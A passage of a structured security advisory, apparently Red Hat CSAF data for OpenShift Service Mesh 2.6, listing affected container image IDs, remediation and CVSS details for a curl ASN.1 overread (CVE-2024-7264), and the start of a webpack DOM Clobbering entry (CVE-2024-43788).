"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-7264", }, { category: "external", summary: "RHBZ#2301888", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2301888", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-7264", url: "https://www.cve.org/CVERecord?id=CVE-2024-7264", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-7264", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-7264", }, { category: "external", summary: "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL", url: "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL", }, ], release_date: "2024-07-31T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "curl: libcurl: ASN.1 date parser overread", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", 